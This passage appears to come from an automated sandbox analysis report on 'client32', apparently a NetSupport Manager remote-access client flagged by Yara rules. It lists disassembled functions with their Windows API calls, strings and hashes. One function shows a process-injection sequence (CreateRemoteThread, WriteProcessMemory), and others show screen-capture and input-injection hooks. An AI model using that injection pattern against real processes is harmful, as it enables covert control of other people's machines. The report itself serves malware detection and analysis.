                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6521E1B5A01718AFC751EFADCD809ABFBF9AF58204700C92AE469C3301E670E401CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetObjectA.GDI32(?,0000003C,?), ref: 110773B6
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 110773C6
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 110773D5
                                                                                                                                                                                                      • Part of subcall function 11142640: GetStockObject.GDI32(0000000D), ref: 11142696
                                                                                                                                                                                                      • Part of subcall function 11142640: GetObjectA.GDI32(00000000,0000003C,?), ref: 111426A8
                                                                                                                                                                                                      • Part of subcall function 11142640: GetDC.USER32(00000000), ref: 111426D4
                                                                                                                                                                                                      • Part of subcall function 11142640: GetDeviceCaps.GDI32(00000000,0000005A), ref: 111426E3
                                                                                                                                                                                                      • Part of subcall function 11142640: ReleaseDC.USER32(00000000,00000000), ref: 111426EE
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110773FF
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11077430
                                                                                                                                                                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 1107743A
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11077445
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 1107746B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$CreateFontIndirectReleaseSelect$CapsDeviceMetricsStockText
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$hdc$m_hWnd
                                                                                                                                                                                                    • API String ID: 493089868-3554473032
                                                                                                                                                                                                    • Opcode ID: 3ddb08b226eeef3e3cf29cf42d01429a3994289165f9e7795ec8246a6313bac5
                                                                                                                                                                                                    • Instruction ID: 566009e177766ebeb0e550f92529a77eb0c2acbf5992a78103c0b9fb2db6236f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ddb08b226eeef3e3cf29cf42d01429a3994289165f9e7795ec8246a6313bac5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E31C076E0162AAFD711DFA1CCC5EDEF7B8EB48358F108069F914A3205EB70A944CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110ED788
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110ED7A8
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,1113EA00), ref: 110ED7B2
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110ED7B8
                                                                                                                                                                                                    • GetObjectA.GDI32(1113EA00,00000018,?), ref: 110ED7C6
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 110ED7D5
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110ED7E0
                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110ED806
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,1113EA00), ref: 110ED811
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 110ED81A
                                                                                                                                                                                                    • SelectObject.GDI32(11003D26,1113EA00), ref: 110ED82A
                                                                                                                                                                                                    • DeleteDC.GDI32(11003D26), ref: 110ED830
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110ED835
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1133104291-0
                                                                                                                                                                                                    • Opcode ID: ceb17ec1d72bb40bc7306424dc9f0ad1c8efb8a277b4ca78c2ab396d6f478ee4
                                                                                                                                                                                                    • Instruction ID: 1258555e92a1aaff948274f601fb2b09853c3fe6d534e09920ba7dca75f72fb8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb17ec1d72bb40bc7306424dc9f0ad1c8efb8a277b4ca78c2ab396d6f478ee4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC314C75D41229BFDB01DFA9CC84FAEB7BCEB89714F10805AF904E3240D674AE418BA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                                                                                    • API String ID: 2111968516-2092292787
                                                                                                                                                                                                    • Opcode ID: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                                                                                                    • Instruction ID: 3cf3aa25874edefcff3c72479187094ffc842d22b257f1b299c377845cd1dbea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF06C3A68111D57AB0187ED780547EF38D678057D7C8809AF8BCEBE20E912DCE0A296
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110895B3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11089685
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 110896EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,?,?,?), ref: 11089704
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 11089710
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1108977E
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 110897EC
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 110897F6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$CriticalInterlockedSection$CreateCurrentDecrementEnterIncrementLeaveResetThreadwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\EVMNGR.cpp$iEventsToCall < ARRAYSIZE(pEventsToCall)$m_pfnEvHandler
                                                                                                                                                                                                    • API String ID: 2547936257-3096566241
                                                                                                                                                                                                    • Opcode ID: 5a8e6f736a4f75f8cc30d27d77e1b2cebf91cc8d4c7ef2a03178e221b9261355
                                                                                                                                                                                                    • Instruction ID: acc9ecc39ebb1e2decf3079a2f80573fc51f1b25f403f4e97c3333a9b2de6fc3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a8e6f736a4f75f8cc30d27d77e1b2cebf91cc8d4c7ef2a03178e221b9261355
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28A16275E04246EFDB01EF94C484B9EBBF5BF88318F158199E815DB241E735E980CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                      • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                      • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMCltReplayClass,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 1105B226
                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 1105B298
                                                                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 1105B339
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 1105B2CD
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 1105B363
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 1105B390
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ExitLibraryProcessUpdate$AddressCreateDefaultErrorFreeLangLastLoadMessageProcRectSystemVersionVisiblewsprintf
                                                                                                                                                                                                    • String ID: CltReplay.cpp$NSMCltReplayClass$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_hWnd || !"CltReplayClass Window failed to create"
                                                                                                                                                                                                    • API String ID: 4274928939-1619494117
                                                                                                                                                                                                    • Opcode ID: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
                                                                                                                                                                                                    • Instruction ID: 79629effa54c5317598ac1fd62f88e21f554d2986a4eda5a7fee751a18d8bf94
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0518D74B00706ABD760DF64CC81FAAF3B9BF44708F108568EA56AB685DB30F944CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegisterClassA.USER32(111E9674), ref: 1105D1F2
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
                                                                                                                                                                                                    • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1105D2F6
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 1105D2FC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                                                                                                                                                                    • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                                                                                                                                                                    • API String ID: 13347155-1383313024
                                                                                                                                                                                                    • Opcode ID: 6615396438022e20a6e8c72f97bc0a79f3717cf56149bec578354cdf49c6fa9e
                                                                                                                                                                                                    • Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6615396438022e20a6e8c72f97bc0a79f3717cf56149bec578354cdf49c6fa9e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106B52F
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106B757
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$BlankClientScreen$BlankWhenLocked$Client$ImageWhenLocked$ScreenScrape$Skip$View$WallPaper$idata->tr
                                                                                                                                                                                                    • API String ID: 3168844106-1048486867
                                                                                                                                                                                                    • Opcode ID: 228252bf60993e848db0fae9416fd11413a540e84ca787b35673dbc210882ab8
                                                                                                                                                                                                    • Instruction ID: 2793f6ef4bea0a2ff565c34b0f8eca561f5e568fe894aa0c90d3ebafbe6a86ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 228252bf60993e848db0fae9416fd11413a540e84ca787b35673dbc210882ab8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD817DB0F40B4AABEB15CF65CC84BDDBBE8BF48314F144259FA25A62D0DB786940CB45
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Valid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1304828667-0
                                                                                                                                                                                                    • Opcode ID: 968f1060436d41cc023d15c317d07752337f542597abbb27ccde972048b352e3
                                                                                                                                                                                                    • Instruction ID: 0b0265ab003c9f5023d50e7461e09058b057b1ac000d34903896340fa356dc58
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 968f1060436d41cc023d15c317d07752337f542597abbb27ccde972048b352e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB419271E0462ADFDB11CFA8D885BAEBBF9EB44705F1081A5FD15E7244DB309901C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110A75D6
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110A75E2
                                                                                                                                                                                                    • GetRgnBox.GDI32(?,11048949), ref: 110A7603
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,00000005), ref: 110A7622
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110A7638
                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000005,00FF0062), ref: 110A7667
                                                                                                                                                                                                    • OffsetRgn.GDI32(00000000,?,00000005), ref: 110A7682
                                                                                                                                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 110A7693
                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000005,00CC0020), ref: 110A76B3
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110A76BE
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 110A76C5
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110A76D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Select$CompatibleCreateObject$BitmapClipDeleteOffsetRelease
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1998184411-0
                                                                                                                                                                                                    • Opcode ID: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
                                                                                                                                                                                                    • Instruction ID: d01220f1ca20b58af6d54b71fb89cfd4fca4eb7da2e1d7c7476d03a363cea98d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C841EA75A00616AFD715CFA8C889EBFBBB9FB8C705F108559FA15A3244CB35AC01CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStretchBltMode.GDI32(?,?,?,1101C9E1,?,00000002,?), ref: 110CD768
                                                                                                                                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 110CD776
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110CD77E
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110CD787
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000280,000001E0), ref: 110CD79A
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110CD7A5
                                                                                                                                                                                                    • StretchBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00000280,000001E0,00CC0020), ref: 110CD80C
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,1101C9E1), ref: 110CD817
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CD821
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 110CD828
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110CD831
                                                                                                                                                                                                    • SetStretchBltMode.GDI32(?,?), ref: 110CD83E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Stretch$ModeObject$CompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3869104054-0
                                                                                                                                                                                                    • Opcode ID: 4cd5c15a1307939a7bc44611b11280addb4b9eea335058283b3b6782dfa3e116
                                                                                                                                                                                                    • Instruction ID: 9115cb6fd31e605d31799654545640bcc5eda688478f30b87190566900b2352f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cd5c15a1307939a7bc44611b11280addb4b9eea335058283b3b6782dfa3e116
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD310BB5600215AFD700DFA8CC89FAEB7B9EF8D705F208159FA15DB294D670AD01CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32,?,?,?,?,00000000), ref: 110FD3AD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetGUIThreadInfo), ref: 110FD3C5
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,SendInput), ref: 110FD43A
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000), ref: 110FD526
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$FreeLoad
                                                                                                                                                                                                    • String ID: 0$GetGUIThreadInfo$SendInput$user32
                                                                                                                                                                                                    • API String ID: 2256533930-271338563
                                                                                                                                                                                                    • Opcode ID: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                                                                                                    • Instruction ID: 43fa602a4ac72add29387a7c175e2a735ec2c38defe54f2081db145d70293a55
                                                                                                                                                                                                    • Opcode Fuzzy Hash: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBA1A270E043A69FDB16CF64CC85BADBBF9FB44708F0081A9E52897284DB759A84CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(Client,00000000,00000001,00000000), ref: 110FD146
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FD17C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FD18A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThread$ErrorLast
                                                                                                                                                                                                    • String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
                                                                                                                                                                                                    • API String ID: 4172138867-3565238984
                                                                                                                                                                                                    • Opcode ID: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                                                                                                    • Instruction ID: fb898e99375fe03a3fe41083e55742ce7b0b576ff4a7e429a818e7135f918612
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72514935E00117ABDB11CFA5CC86FBEBBA9FF85718F104579F92597280E734A80187A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 11075147
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 1107514D
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 11075157
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 110751AC
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?), ref: 110751B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalInitializeSection$CreateEvent
                                                                                                                                                                                                    • String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
                                                                                                                                                                                                    • API String ID: 57637462-2298398812
                                                                                                                                                                                                    • Opcode ID: 101c914b05177881ec245bda3357267694e324779d68a357ac5e1a99ed44891f
                                                                                                                                                                                                    • Instruction ID: 70b4afe334662900ba144283dba1d254b6ac8626561bf164637f2426a4e69d92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 101c914b05177881ec245bda3357267694e324779d68a357ac5e1a99ed44891f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD419EB5A003859FDB11CF65CC84FDA7BE9FB84304F0480AAEE499F286D771A504CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32,BBC4A55B,?,00000130,00000000), ref: 1110B2B7
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateRemoteThread), ref: 1110B2D3
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ExitThread), ref: 1110B2FB
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1110B31B
                                                                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,00010003), ref: 1110B335
                                                                                                                                                                                                    • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 1110B353
                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 1110B37C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ContextErrorHandleLastMemoryModuleProcessQueryThreadVirtualWrite
                                                                                                                                                                                                    • String ID: CreateRemoteThread$ExitThread$Kernel32
                                                                                                                                                                                                    • API String ID: 2506007406-954188167
                                                                                                                                                                                                    • Opcode ID: 207106952b3bf2e8a718348c9896f8b1116ab77e8e3a14b9ad5e717d8d90e138
                                                                                                                                                                                                    • Instruction ID: 97ed16d7b0c3fa5e0af1d235dd7a19e0829cf9589d7be3395e73c9348ca53aec
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 207106952b3bf2e8a718348c9896f8b1116ab77e8e3a14b9ad5e717d8d90e138
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C3193B5D4522AAFEB11CF65CC88BAEF7B8FB44314F1081B9E919E6240DB309A40CF55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 11140450: GetTickCount.KERNEL32 ref: 111404B8
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029126
                                                                                                                                                                                                    • Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029151
                                                                                                                                                                                                    • Info. assert, restarting..., xrefs: 1102920D
                                                                                                                                                                                                    • Client32, xrefs: 11029185
                                                                                                                                                                                                    • V12.10F4, xrefs: 11029143
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess$CountErrorLastMessageTickwsprintf
